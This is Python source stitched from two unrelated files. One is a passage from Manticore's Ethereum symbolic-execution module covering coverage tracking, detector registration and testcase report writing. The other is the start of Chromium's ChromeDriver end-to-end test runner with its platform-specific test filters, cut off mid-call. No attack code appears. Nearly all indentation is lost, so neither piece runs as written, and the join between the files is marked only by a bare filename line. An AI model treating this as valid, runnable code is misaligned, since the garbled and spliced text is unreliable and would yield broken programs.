''' INTERNAL USE '''
logger.debug("%s", state.platform.current_vm)
#TODO move to a plugin
at_init = state.platform.current_transaction.sort == 'CREATE'
if at_init:
coverage_context_name = 'init_coverage'
else:
coverage_context_name = 'runtime_coverage'
with self.locked_context(coverage_context_name, set) as coverage:
coverage.add((state.platform.current_vm.address, instruction.pc))
state.context.setdefault('evm.trace', []).append((state.platform.current_vm.address, instruction.pc, at_init))
def _did_evm_read_code(self, state, offset, size):
''' INTERNAL USE '''
with self.locked_context('code_data', set) as code_data:
for i in range(offset, offset + size):
code_data.add((state.platform.current_vm.address, i))
def get_metadata(self, address):
        ''' Gets the Solidity metadata for `address`.
            This is available only if the address is a contract created from Solidity source
        '''
return self.metadata.get(int(address))
def register_detector(self, d):
if not isinstance(d, Detector):
raise EthereumError("Not a Detector")
if d.name in self.detectors:
raise EthereumError("Detector already registered")
self.detectors[d.name] = d
self.register_plugin(d)
return d.name
def unregister_detector(self, d):
if not isinstance(d, (Detector, str)):
raise EthereumError("Not a Detector")
name = d
if isinstance(d, Detector):
name = d.name
if name not in self.detectors:
raise EthereumError("Detector not registered")
d = self.detectors[name]
del self.detectors[name]
self.unregister_plugin(d)
@property
def workspace(self):
return self._executor._workspace._store.uri
def generate_testcase(self, state, name, message=''):
self._generate_testcase_callback(state, name, message)
def _generate_testcase_callback(self, state, name, message=''):
'''
Create a serialized description of a given state.
:param state: The state to generate information about
:param message: Accompanying message
'''
        # workspace should not be responsible for formatting the output
# each object knows its secrets, each class should be able to report its
# final state
#super(ManticoreEVM, self)._generate_testcase_callback(state, name, message)
# TODO(mark): Refactor ManticoreOutput to let the platform be more in control
# so this function can be fully ported to EVMWorld.generate_workspace_files.
blockchain = state.platform
def flagged(flag):
return '(*)' if flag else ''
testcase = self._output.testcase(name.replace(' ', '_'))
last_tx = blockchain.last_transaction
if last_tx:
message = message + last_tx.result
logger.info("Generated testcase No. {} - {}".format(testcase.num, message))
local_findings = set()
for detector in self.detectors.values():
for address, pc, finding, at_init in detector.get_findings(state):
if (address, pc, finding, at_init) not in local_findings:
local_findings.add((address, pc, finding, at_init))
if len(local_findings):
with testcase.open_stream('findings') as findings:
for address, pc, finding, at_init in local_findings:
findings.write('- %s -\n' % finding)
findings.write(' Contract: 0x%x\n' % address)
findings.write(' EVM Program counter: %s%s\n' % (pc, at_init and " (at constructor)" or ""))
md = self.get_metadata(address)
if md is not None:
src = md.get_source_for(pc, runtime=not at_init)
findings.write(' Snippet:\n')
findings.write(src.replace('\n', '\n ').strip())
findings.write('\n')
with testcase.open_stream('summary') as summary:
summary.write("Message: %s\n" % message)
summary.write("Last exception: %s\n" % state.context.get('last_exception', 'None'))
if last_tx:
at_runtime = last_tx.sort != 'CREATE'
address, offset, at_init = state.context['evm.trace'][-1]
assert at_runtime != at_init
                # Last instruction, if the last tx was valid
if state.context['last_exception'].message != 'TXERROR':
metadata = self.get_metadata(blockchain.last_transaction.address)
if metadata is not None:
summary.write('Last instruction at contract %x offset %x\n' % (address, offset))
source_code_snippet = metadata.get_source_for(offset, at_runtime)
if source_code_snippet:
summary.write(source_code_snippet)
summary.write('\n')
# Accounts summary
is_something_symbolic = False
summary.write("%d accounts.\n" % len(blockchain.accounts))
for account_address in blockchain.accounts:
is_account_address_symbolic = issymbolic(account_address)
account_address = state.solve_one(account_address)
summary.write("* %s::\n" % self.account_name(account_address))
summary.write("Address: 0x%x %s\n" % (account_address, flagged(is_account_address_symbolic)))
balance = blockchain.get_balance(account_address)
is_balance_symbolic = issymbolic(balance)
is_something_symbolic = is_something_symbolic or is_balance_symbolic
balance = state.solve_one(balance)
summary.write("Balance: %d %s\n" % (balance, flagged(is_balance_symbolic)))
from .core.smtlib.visitors import translate_to_smtlib
storage = blockchain.get_storage(account_address)
summary.write("Storage: %s\n" % translate_to_smtlib(storage, use_bindings=True))
all_used_indexes = []
with state.constraints as temp_cs:
index = temp_cs.new_bitvec(256)
storage = blockchain.get_storage(account_address)
temp_cs.add(storage.get(index) != 0)
try:
while True:
a_index = solver.get_value(temp_cs, index)
all_used_indexes.append(a_index)
temp_cs.add(storage.get(a_index) != 0)
temp_cs.add(index != a_index)
except:
pass
if all_used_indexes:
summary.write("Storage:\n")
for i in all_used_indexes:
value = storage.get(i)
is_storage_symbolic = issymbolic(value)
summary.write("storage[%x] = %x %s\n" % (state.solve_one(i), state.solve_one(value), flagged(is_storage_symbolic)))
'''if blockchain.has_storage(account_address):
summary.write("Storage:\n")
for offset, value in blockchain.get_storage_items(account_address):
is_storage_symbolic = issymbolic(offset) or issymbolic(value)
offset = state.solve_one(offset)
value = state.solve_one(value)
summary.write("\t%032x -> %032x %s\n" % (offset, value, flagged(is_storage_symbolic)))
is_something_symbolic = is_something_symbolic or is_storage_symbolic
'''
runtime_code = state.solve_one(blockchain.get_code(account_address))
if runtime_code:
summary.write("Code:\n")
fcode = StringIO.StringIO(runtime_code)
for chunk in iter(lambda: fcode.read(32), b''):
summary.write('\t%s\n' % chunk.encode('hex'))
runtime_trace = set((pc for contract, pc, at_init in state.context['evm.trace'] if address == contract and not at_init))
summary.write("Coverage %d%% (on this state)\n" % calculate_coverage(runtime_code, runtime_trace)) # coverage % for address in this account/state
summary.write("\n")
if blockchain._sha3:
summary.write("Known hashes:\n")
for key, value in blockchain._sha3.items():
summary.write('%s::%x\n' % (key.encode('hex'), value))
if is_something_symbolic:
summary.write('\n\n(*) Example solution given. Value is symbolic and may take other values\n')
# Transactions
with testcase.open_stream('tx') as tx_summary:
is_something_symbolic = False
for tx in blockchain.transactions: # external transactions
                tx_summary.write("Transaction Nr. %d\n" % blockchain.transactions.index(tx))
# The result if any RETURN or REVERT
tx_summary.write("Type: %s (%d)\n" % (tx.sort, tx.depth))
caller_solution = state.solve_one(tx.caller)
caller_name = self.account_name(caller_solution)
tx_summary.write("From: %s(0x%x) %s\n" % (caller_name, caller_solution, flagged(issymbolic(tx.caller))))
address_solution = state.solve_one(tx.address)
address_name = self.account_name(address_solution)
tx_summary.write("To: %s(0x%x) %s\n" % (address_name, address_solution, flagged(issymbolic(tx.address))))
tx_summary.write("Value: %d %s\n" % (state.solve_one(tx.value), flagged(issymbolic(tx.value))))
tx_data = state.solve_one(tx.data)
tx_summary.write("Data: %s %s\n" % (binascii.hexlify(tx_data), flagged(issymbolic(tx.data))))
if tx.return_data is not None:
return_data = state.solve_one(tx.return_data)
tx_summary.write("Return_data: %s %s\n" % (binascii.hexlify(return_data), flagged(issymbolic(tx.return_data))))
metadata = self.get_metadata(tx.address)
if tx.sort == 'CALL':
if metadata is not None:
function_id = tx.data[:4] # hope there is enough data
function_id = binascii.hexlify(state.solve_one(function_id))
signature = metadata.get_func_signature(function_id)
function_name = metadata.get_func_name(function_id)
if signature:
_, arguments = ABI.deserialize(signature, tx.data)
else:
arguments = (tx.data,)
return_data = None
if tx.result == 'RETURN':
ret_types = metadata.get_func_return_types(function_id)
return_data = ABI.deserialize(ret_types, tx.return_data) # function return
tx_summary.write('\n')
tx_summary.write("Function call:\n")
tx_summary.write("%s(" % state.solve_one(function_name))
tx_summary.write(','.join(map(repr, map(state.solve_one, arguments))))
is_argument_symbolic = any(map(issymbolic, arguments))
is_something_symbolic = is_something_symbolic or is_argument_symbolic
tx_summary.write(') -> %s %s\n' % (tx.result, flagged(is_argument_symbolic)))
if return_data is not None:
is_return_symbolic = any(map(issymbolic, return_data))
return_values = tuple(map(state.solve_one, return_data))
if len(return_values) == 1:
return_values = return_values[0]
tx_summary.write('return: %r %s\n' % (return_values, flagged(is_return_symbolic)))
is_something_symbolic = is_something_symbolic or is_return_symbolic
tx_summary.write('\n\n')
if is_something_symbolic:
tx_summary.write('\n\n(*) Example solution given. Value is symbolic and may take other values\n')
# logs
with testcase.open_stream('logs') as logs_summary:
is_something_symbolic = False
for log_item in blockchain.logs:
is_log_symbolic = issymbolic(log_item.memlog)
is_something_symbolic = is_log_symbolic or is_something_symbolic
solved_memlog = state.solve_one(log_item.memlog)
printable_bytes = ''.join(filter(lambda c: c in string.printable, map(chr, solved_memlog)))
logs_summary.write("Address: %x\n" % log_item.address)
logs_summary.write("Memlog: %s (%s) %s\n" % (binascii.hexlify(solved_memlog), printable_bytes, flagged(is_log_symbolic)))
logs_summary.write("Topics:\n")
for i, topic in enumerate(log_item.topics):
logs_summary.write("\t%d) %x %s" % (i, state.solve_one(topic), flagged(issymbolic(topic))))
with testcase.open_stream('constraints') as smt_summary:
smt_summary.write(str(state.constraints))
with testcase.open_stream('pkl') as statef:
try:
statef.write(pickle.dumps(state, 2))
except RuntimeError:
# recursion exceeded. try a slower, iterative solution
from .utils import iterpickle
logger.debug("Using iterpickle to dump state")
statef.write(iterpickle.dumps(state, 2))
trace = state.context.get('evm.trace')
if trace:
with testcase.open_stream('trace') as f:
self._emit_trace_file(f, trace)
return testcase
@staticmethod
def _emit_trace_file(filestream, trace):
"""
:param filestream: file object for the workspace trace file
:param trace: list of (contract address, pc) tuples
:type trace: list[tuple(int, int)]
"""
for contract, pc, at_init in trace:
if pc == 0:
filestream.write('---\n')
ln = '0x{:x}:0x{:x} {}\n'.format(contract, pc, '*' if at_init else '')
filestream.write(ln)
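    # For reference, each emitted trace line looks like
    #   0x<contract address>:0x<pc> [*]
    # with a '---' separator whenever the program counter wraps back to 0 and a
    # trailing '*' marking instructions executed during contract construction.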
@property
def global_findings(self):
global_findings = set()
for detector in self.detectors.values():
for address, pc, finding, at_init in detector.global_findings:
if (address, pc, finding, at_init) not in global_findings:
global_findings.add((address, pc, finding, at_init))
return global_findings
def finalize(self):
"""
Terminate and generate testcases for all currently alive states (contract states that cleanly executed
to a STOP or RETURN in the last symbolic transaction).
"""
logger.debug("Finalizing %d states.", self.count_states())
def finalizer(state_id):
state_id = self._terminate_state_id(state_id)
st = self.load(state_id)
logger.debug("Generating testcase for state_id %d", state_id)
self._generate_testcase_callback(st, 'test', '')
def worker_finalize(q):
try:
while True:
finalizer(q.get_nowait())
except EmptyQueue:
pass
q = Queue()
for state_id in self._all_state_ids:
            # The -1 state must be handled before forking because it may only exist in memory
if state_id == -1:
finalizer(-1)
else:
q.put(state_id)
report_workers = []
for _ in range(self._config_procs):
proc = Process(target=worker_finalize, args=(q,))
proc.start()
report_workers.append(proc)
for proc in report_workers:
proc.join()
#global summary
if len(self.global_findings):
with self._output.save_stream('global.findings') as global_findings:
for address, pc, finding, at_init in self.global_findings:
global_findings.write('- %s -\n' % finding)
global_findings.write(' Contract: %s\n' % address)
global_findings.write(' EVM Program counter: %s%s\n' % (pc, at_init and " (at constructor)" or ""))
md = self.get_metadata(address)
if md is not None:
src = md.get_source_for(pc, runtime=not at_init)
global_findings.write(' Solidity snippet:\n')
global_findings.write(src.replace('\n', '\n ').strip())
global_findings.write('\n')
with self._output.save_stream('global.summary') as global_summary:
            # (accounts created by contract code are not in this list)
global_summary.write("Global runtime coverage:\n")
for address in self.contract_accounts.values():
global_summary.write("{:x}: {:2.2f}%\n".format(int(address), self.global_coverage(address)))
md = self.get_metadata(address)
if md is not None and len(md.warnings) > 0:
global_summary.write('\n\nCompiler warnings for %s:\n' % md.name)
global_summary.write(md.warnings)
for address, md in self.metadata.items():
with self._output.save_stream('global_%s.sol' % md.name) as global_src:
global_src.write(md.source_code)
with self._output.save_stream('global_%s_runtime.bytecode' % md.name) as global_runtime_bytecode:
global_runtime_bytecode.write(md.runtime_bytecode)
with self._output.save_stream('global_%s_init.bytecode' % md.name) as global_init_bytecode:
global_init_bytecode.write(md.init_bytecode)
with self._output.save_stream('global_%s.runtime_asm' % md.name) as global_runtime_asm:
runtime_bytecode = md.runtime_bytecode
with self.locked_context('runtime_coverage') as seen:
count, total = 0, 0
for i in evm.EVMAsm.disassemble_all(runtime_bytecode):
if (address, i.pc) in seen:
count += 1
global_runtime_asm.write('*')
else:
global_runtime_asm.write(' ')
global_runtime_asm.write('%4x: %s\n' % (i.pc, i))
total += 1
with self._output.save_stream('global_%s.init_asm' % md.name) as global_init_asm:
with self.locked_context('init_coverage') as seen:
count, total = 0, 0
for i in evm.EVMAsm.disassemble_all(md.init_bytecode):
if (address, i.pc) in seen:
count += 1
global_init_asm.write('*')
else:
global_init_asm.write(' ')
global_init_asm.write('%4x: %s\n' % (i.pc, i))
total += 1
with self._output.save_stream('global_%s.init_visited' % md.name) as f:
with self.locked_context('init_coverage') as seen:
visited = set((o for (a, o) in seen if a == address))
for o in sorted(visited):
f.write('0x%x\n' % o)
with self._output.save_stream('global_%s.runtime_visited' % md.name) as f:
with self.locked_context('runtime_coverage') as seen:
visited = set()
for (a, o) in seen:
if a == address:
visited.add(o)
for o in sorted(visited):
f.write('0x%x\n' % o)
# delete actual streams from storage
for state_id in self._all_state_ids:
            # state_id -1 only ever lives in memory
if state_id != -1:
self._executor._workspace.rm_state(state_id)
# clean up lists
with self.locked_context('seth') as seth_context:
seth_context['_saved_states'] = set()
seth_context['_final_states'] = set()
logger.info("Results in %s", self.workspace)
def global_coverage(self, account):
        ''' Returns code coverage for the contract at address `account`.
            This sums up all the visited code lines from any of the explored
            states.
        '''
account_address = int(account)
runtime_bytecode = None
#Search one state in which the account_address exists
for state in self.all_states:
world = state.platform
if account_address in world:
code = world.get_code(account_address)
runtime_bytecode = state.solve_one(code)
break
else:
return 0.0
with self.locked_context('runtime_coverage') as coverage:
seen = {off for addr, off in coverage if addr == account_address}
return calculate_coverage(runtime_bytecode, seen)
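    # For reference: coverage is derived from the 'runtime_coverage' set of
    # (address, pc) pairs recorded in _did_evm_execute_instruction_callback, so
    # it aggregates visited instructions across all explored states, not just
    # the single state used above to solve the runtime bytecode.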
# TODO: Find a better way to suppress execution of Manticore._did_finish_run_callback
# We suppress because otherwise we log it many times and it looks weird.
def _did_finish_run_callback(self):
pass
|
run_py_tests.py
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""End to end tests for ChromeDriver."""
# Note that to run Android tests you must have the following line in
# .gclient (in the parent directory of src): target_os = [ 'android' ]
# to get the appropriate adb version for ChromeDriver.
# TODO (crbug.com/857239): Remove above comment when adb version
# is updated in Devil.
from __future__ import print_function
from __future__ import absolute_import
import base64
import json
import math
import optparse
import os
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import six.moves.urllib.request, six.moves.urllib.parse, six.moves.urllib.error
import uuid
import imghdr
import struct
from six.moves import map
from six.moves import range
from six.moves import zip
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
_PARENT_DIR = os.path.join(_THIS_DIR, os.pardir)
_CLIENT_DIR = os.path.join(_PARENT_DIR, "client")
_SERVER_DIR = os.path.join(_PARENT_DIR, "server")
_TEST_DIR = os.path.join(_PARENT_DIR, "test")
sys.path.insert(1, _PARENT_DIR)
import chrome_paths
import util
sys.path.remove(_PARENT_DIR)
sys.path.insert(1, _CLIENT_DIR)
import chromedriver
import websocket_connection
import webelement
import webshadowroot
sys.path.remove(_CLIENT_DIR)
sys.path.insert(1, _SERVER_DIR)
import server
sys.path.remove(_SERVER_DIR)
sys.path.insert(1, _TEST_DIR)
import unittest_util
import webserver
sys.path.remove(_TEST_DIR)
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party',
'catapult', 'third_party', 'gsutil',
'third_party', 'monotonic'))
from monotonic import monotonic
_TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver')
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party',
'catapult', 'devil'))
from devil.android import device_utils
from devil.android import forwarder
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
import devil_chromium
from pylib import constants
_NEGATIVE_FILTER = [
# This test is too flaky on the bots, but seems to run perfectly fine
# on developer workstations.
'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed',
'ChromeDriverTest.testEmulateNetworkConditionsSpeed',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=833
'ChromeDriverTest.testAlertOnNewWindow',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2532
'ChromeDriverPageLoadTimeoutTest.testRefreshWithPageLoadTimeout',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=3517
'ChromeDriverTest.testPrint',
'ChromeDriverTest.testPrintInvalidArgument',
]
_OS_SPECIFIC_FILTER = {}
_OS_SPECIFIC_FILTER['win'] = [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=299
'ChromeLogPathCapabilityTest.testChromeLogPath',
# https://bugs.chromium.org/p/chromium/issues/detail?id=1196363
'ChromeDownloadDirTest.testFileDownloadAfterTabHeadless',
'ChromeDownloadDirTest.testFileDownloadWithClickHeadless',
'ChromeDownloadDirTest.testFileDownloadWithGetHeadless',
'HeadlessChromeDriverTest.testNewTabDoesNotFocus',
'HeadlessChromeDriverTest.testNewWindowDoesNotFocus',
'HeadlessChromeDriverTest.testPrintHeadless',
'HeadlessChromeDriverTest.testPrintInvalidArgumentHeadless',
'HeadlessChromeDriverTest.testWindowFullScreen',
'HeadlessInvalidCertificateTest.testLoadsPage',
'HeadlessInvalidCertificateTest.testNavigateNewWindow',
'RemoteBrowserTest.testConnectToRemoteBrowserLiteralAddressHeadless',
]
_OS_SPECIFIC_FILTER['linux'] = [
]
_OS_SPECIFIC_FILTER['mac'] = [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1927
# https://crbug.com/1036636
'MobileEmulationCapabilityTest.testTapElement',
# https://bugs.chromium.org/p/chromium/issues/detail?id=1011225
'ChromeDriverTest.testActionsMultiTouchPoint',
# Flaky: https://crbug.com/1156576.
'ChromeDriverTestLegacy.testContextMenuEventFired',
# Flaky: https://crbug.com/1157533.
'ChromeDriverTest.testShadowDomFindElement',
]
_DESKTOP_NEGATIVE_FILTER = [
# Desktop doesn't support touch (without --touch-events).
'ChromeDriverTestLegacy.testTouchSingleTapElement',
'ChromeDriverTest.testTouchDownMoveUpElement',
'ChromeDriverTestLegacy.testTouchScrollElement',
'ChromeDriverTestLegacy.testTouchDoubleTapElement',
'ChromeDriverTestLegacy.testTouchLongPressElement',
'ChromeDriverTest.testTouchFlickElement',
'ChromeDriverAndroidTest.*',
]
_INTEGRATION_NEGATIVE_FILTER = [
# The following test is flaky on Windows and Mac.
'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences',
# ChromeDriverLogTest tests an internal ChromeDriver feature, not needed
# for integration test.
'ChromeDriverLogTest.*',
# ChromeDriverPageLoadTimeoutTest is flaky, particularly on Mac.
'ChromeDriverPageLoadTimeoutTest.*',
    # Some trivial test cases that provide no additional value beyond what is
    # already tested by other test cases.
'ChromeDriverTest.testGetCurrentWindowHandle',
'ChromeDriverTest.testStartStop',
# PerfTest takes a long time, requires extra setup, and adds little value
# to integration testing.
'PerfTest.*',
# Flaky: https://crbug.com/899919
'SessionHandlingTest.testGetSessions',
# Flaky due to occasional timeout in starting Chrome
'ZChromeStartRetryCountTest.testChromeStartRetryCount',
]
def _GetDesktopNegativeFilter():
  negative_filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
  platform = util.GetPlatformName()
  if platform in _OS_SPECIFIC_FILTER:
    negative_filter += _OS_SPECIFIC_FILTER[platform]
  return negative_filter
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
_NEGATIVE_FILTER + [
# Android doesn't support switches and extensions.
'ChromeSwitchesCapabilityTest.*',
'ChromeExtensionsCapabilityTest.*',
'MobileEmulationCapabilityTest.*',
'ChromeDownloadDirTest.*',
# https://crbug.com/274650
'ChromeDriverTest.testCloseWindow',
# Most window operations don't make sense on Android.
'ChromeDriverTest.testWindowFullScreen',
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
'ChromeDriverTest.testWindowRect',
'ChromeDriverTest.testWindowMaximize',
'ChromeDriverTest.testWindowMinimize',
'ChromeLogPathCapabilityTest.testChromeLogPath',
# Connecting to running browser is not supported on Android.
'RemoteBrowserTest.*',
# Don't enable perf testing on Android yet.
'PerfTest.*',
# Android doesn't support multiple sessions on one device.
'SessionHandlingTest.testGetSessions',
# Android doesn't use the chrome://print dialog.
'ChromeDriverTest.testCanSwitchToPrintPreviewDialog',
# Chrome 44+ for Android doesn't dispatch the dblclick event
'ChromeDriverTest.testMouseDoubleClick',
        # A page cannot be loaded from a file:// URI on Android unless it
        # is stored on the device.
'ChromeDriverTest.testCanClickAlertInIframes',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2081
'ChromeDriverTest.testCloseWindowUsingJavascript',
# Android doesn't support headless mode
'HeadlessInvalidCertificateTest.*',
'HeadlessChromeDriverTest.*',
# Tests of the desktop Chrome launch process.
'LaunchDesktopTest.*',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2737
'ChromeDriverTest.testTakeElementScreenshot',
'ChromeDriverTest.testTakeElementScreenshotPartlyVisible',
'ChromeDriverTest.testTakeElementScreenshotInIframe',
# setWindowBounds not supported on Android
'ChromeDriverTest.testTakeLargeElementScreenshot',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2786
'ChromeDriverTest.testActionsTouchTap',
'ChromeDriverTest.testTouchDownMoveUpElement',
'ChromeDriverTest.testTouchFlickElement',
# Android has no concept of tab or window, and will always lose focus
# on tab creation. https://crbug.com/chromedriver/3018
'ChromeDriverTest.testNewWindowDoesNotFocus',
'ChromeDriverTest.testNewTabDoesNotFocus',
# Android does not support the virtual authenticator environment.
'ChromeDriverSecureContextTest.*',
# Covered by Desktop tests; can't create 2 browsers in Android
'SupportIPv4AndIPv6.testSupportIPv4AndIPv6',
# Browser context management is not supported by Android
'ChromeDriverTest.testClipboardPermissions',
'ChromeDriverTest.testMidiPermissions',
'ChromeDriverTest.testMultiplePermissions',
'ChromeDriverTest.testNewWindowSameDomainHasSamePermissions',
'ChromeDriverTest.testPermissionStates',
'ChromeDriverTest.testPermissionsOpaqueOriginsThrowError',
'ChromeDriverTest.testPermissionsSameOrigin',
'ChromeDriverTest.testPermissionsSameOriginDoesNotAffectOthers',
'ChromeDriverTest.testPersistentStoragePermissions',
'ChromeDriverTest.testPushAndNotificationsPermissions',
'ChromeDriverTest.testSensorPermissions',
'ChromeDriverTest.testSettingPermissionDoesNotAffectOthers',
# Android does not allow changing window size
'JavaScriptTests.*',
# These tests are failing on Android
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=3560
'ChromeDriverTest.testTakeLargeElementViewportScreenshot',
'ChromeDriverTest.testTakeLargeElementFullPageScreenshot'
]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350
'ChromeDriverTest.testSlowIFrame',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
'ChromeDriverTest.testGetLogOnClosedWindow',
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
'ChromeDriverTest.testSwitchToWindow',
# Feature not yet supported in this version
'ChromeDriverTest.testGenerateTestReport',
]
)
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503
'ChromeDriverTest.testGetLogOnClosedWindow',
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
'ChromeDriverTest.testSwitchToWindow',
# Feature not yet supported in this version
'ChromeDriverTest.testGenerateTestReport',
]
)
_ANDROID_NEGATIVE_FILTER['chromium'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + []
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome_stable'] + [
# WebView doesn't support emulating network conditions.
'ChromeDriverTest.testEmulateNetworkConditions',
'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed',
'ChromeDriverTest.testEmulateNetworkConditionsOffline',
'ChromeDriverTest.testEmulateNetworkConditionsSpeed',
'ChromeDriverTest.testEmulateNetworkConditionsName',
# WebView shell doesn't support popups or popup blocking.
'ChromeDriverTest.testPopups',
'ChromeDriverTest.testDontGoBackOrGoForward',
# ChromeDriver WebView shell doesn't support multiple tabs.
'ChromeDriverTest.testCloseWindowUsingJavascript',
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testSwitchToWindow',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
'ChromeDriverTest.testGetLogOnClosedWindow',
# The WebView shell that we test against (on KitKat) does not perform
# cross-process navigations.
# TODO(samuong): reenable when it does.
'ChromeDriverPageLoadTimeoutTest.testPageLoadTimeoutCrossDomain',
'ChromeDriverPageLoadTimeoutTest.'
'testHistoryNavigationWithPageLoadTimeout',
# Webview shell doesn't support Alerts.
'ChromeDriverTest.testAlert',
'ChromeDriverTest.testAlertOnNewWindow',
'ChromeDesiredCapabilityTest.testUnexpectedAlertBehaviour',
'ChromeDriverTest.testAlertHandlingOnPageUnload',
'ChromeDriverTest.testClickElementAfterNavigation',
'ChromeDriverTest.testGetLogOnWindowWithAlert',
'ChromeDriverTest.testSendTextToAlert',
'ChromeDriverTest.testUnexpectedAlertOpenExceptionMessage',
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2332
'ChromeDriverTestLegacy.testTouchScrollElement',
]
)
class ChromeDriverBaseTest(unittest.TestCase):
"""Base class for testing chromedriver functionalities."""
def __init__(self, *args, **kwargs):
super(ChromeDriverBaseTest, self).__init__(*args, **kwargs)
self._drivers = []
def tearDown(self):
for driver in self._drivers:
try:
driver.Quit()
except:
pass
def CreateDriver(self, server_url=None, server_pid=None,
download_dir=None, **kwargs):
if server_url is None:
server_url = _CHROMEDRIVER_SERVER_URL
if server_pid is None:
server_pid = _CHROMEDRIVER_SERVER_PID
if (not _ANDROID_PACKAGE_KEY and 'debugger_address' not in kwargs and
'_MINIDUMP_PATH' in globals() and _MINIDUMP_PATH):
# Environment required for minidump not supported on Android
# minidumpPath will fail parsing if debugger_address is set
if 'experimental_options' in kwargs:
if 'minidumpPath' not in kwargs['experimental_options']:
kwargs['experimental_options']['minidumpPath'] = _MINIDUMP_PATH
else:
kwargs['experimental_options'] = {'minidumpPath': _MINIDUMP_PATH}
android_package = None
android_activity = None
android_process = None
if _ANDROID_PACKAGE_KEY:
android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package
if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell':
android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity
android_process = '%s:main' % android_package
driver = chromedriver.ChromeDriver(server_url, server_pid,
chrome_binary=_CHROME_BINARY,
android_package=android_package,
android_activity=android_activity,
android_process=android_process,
download_dir=download_dir,
test_name=self.id(),
**kwargs)
self._drivers += [driver]
return driver
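  # Illustrative usage from a test method (a minimal sketch, not from the
  # original source; the test name is assumed):
  #
  #   def testExample(self):
  #     driver = self.CreateDriver(page_load_strategy='eager')
  #     driver.Load('about:blank')
  #
  # Every driver created here is tracked in self._drivers and quit in
  # tearDown(), so tests do not need to clean up explicitly.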
def WaitForNewWindow(self, driver, old_handles, check_closed_windows=True):
"""Wait for at least one new window to show up in 20 seconds.
Args:
old_handles: Handles to all old windows before the new window is added.
check_closed_windows: If True, assert that no windows are closed before
the new window is added.
Returns:
Handle to a new window. None if timeout.
"""
deadline = monotonic() + 20
while monotonic() < deadline:
handles = driver.GetWindowHandles()
if check_closed_windows:
self.assertTrue(set(old_handles).issubset(handles))
new_handles = set(handles).difference(set(old_handles))
if len(new_handles) > 0:
return new_handles.pop()
time.sleep(0.01)
return None
  def WaitForCondition(self, predicate, timeout=5, timestep=0.1):
    """Wait for a condition to become true.
    Args:
      predicate: A function that returns a boolean value.
      timeout: Maximum time to wait, in seconds.
      timestep: Time to sleep between checks, in seconds.
    Returns:
      True if the condition became true before the deadline, False otherwise.
    """
deadline = monotonic() + timeout
while monotonic() < deadline:
if predicate():
return True
time.sleep(timestep)
return False
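  # Illustrative usage (not from the original source): poll until the page
  # source contains some expected text, giving up after the default 5 seconds.
  #
  #   self.WaitForCondition(lambda: 'hello' in driver.GetPageSource())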
class ChromeDriverBaseTestWithWebServer(ChromeDriverBaseTest):
@staticmethod
def GlobalSetUp():
ChromeDriverBaseTestWithWebServer._http_server = webserver.WebServer(
chrome_paths.GetTestData())
ChromeDriverBaseTestWithWebServer._sync_server = webserver.SyncWebServer()
cert_path = os.path.join(chrome_paths.GetTestData(),
'chromedriver/invalid_ssl_cert.pem')
ChromeDriverBaseTestWithWebServer._https_server = webserver.WebServer(
chrome_paths.GetTestData(), cert_path)
def respondWithUserAgentString(request):
return {}, """
<html>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
def respondWithUserAgentStringUseDeviceWidth(request):
return {}, """
<html>
<head>
<meta name="viewport" content="width=device-width,minimum-scale=1.0">
</head>
<body>%s</body>
</html>""" % request.GetHeader('User-Agent')
ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
'/userAgent', respondWithUserAgentString)
ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath(
'/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth)
if _ANDROID_PACKAGE_KEY:
ChromeDriverBaseTestWithWebServer._device = (
device_utils.DeviceUtils.HealthyDevices()[0])
http_host_port = (
ChromeDriverBaseTestWithWebServer._http_server._server.server_port)
sync_host_port = (
ChromeDriverBaseTestWithWebServer._sync_server._server.server_port)
https_host_port = (
ChromeDriverBaseTestWithWebServer._https_server._server.server_port)
forwarder.Forwarder.Map(
